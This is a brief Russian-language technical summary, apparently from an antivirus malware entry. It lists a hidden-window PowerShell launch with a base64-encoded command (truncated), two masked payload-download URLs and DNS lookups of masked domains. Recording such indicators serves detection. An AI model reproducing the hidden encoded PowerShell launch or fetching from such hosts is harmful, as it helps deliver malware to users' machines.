Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABPAG0AaQByAHYAbwBtAHAAcABjAGwAYQBpAD0AJwBQAGwAdQBqAGEAbQBqAGoAeQBqAHAAJwA7ACQASQBjAHkAeABvAHAAZgBpAHoAZgBrAHoAYwAgAD0AIAAnADEANwA2ACcAOwAkAEcAdwBpAG0AawBmAHgAbwA9ACcASgB2AG4AagB...
- http://vi##sa.com/administrator/OMM4w/
- http://co###izate.com/Sitio_web/8PzLe0/
- DNS ASK de##.#oolatech.com
- DNS ASK vi##sa.com
- DNS ASK sn####lthmedico.com
- DNS ASK co###izate.com
- DNS ASK my##ol.biz
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABPAG0AaQByAHYAbwBtAHAAcABjAGwAYQBpAD0AJwBQAGwAdQBqAGEAbQBqAGoAeQBqAHAAJwA7ACQASQBjAHkAeABvAHAAZgBpAHoAZgBrAHoAYwAgAD0AIAAnADEANwA2ACcAOwAkAEcAdwBpAG0AawBmAHgAbwA9ACcASgB2AG4AagB...' (со скрытым окном)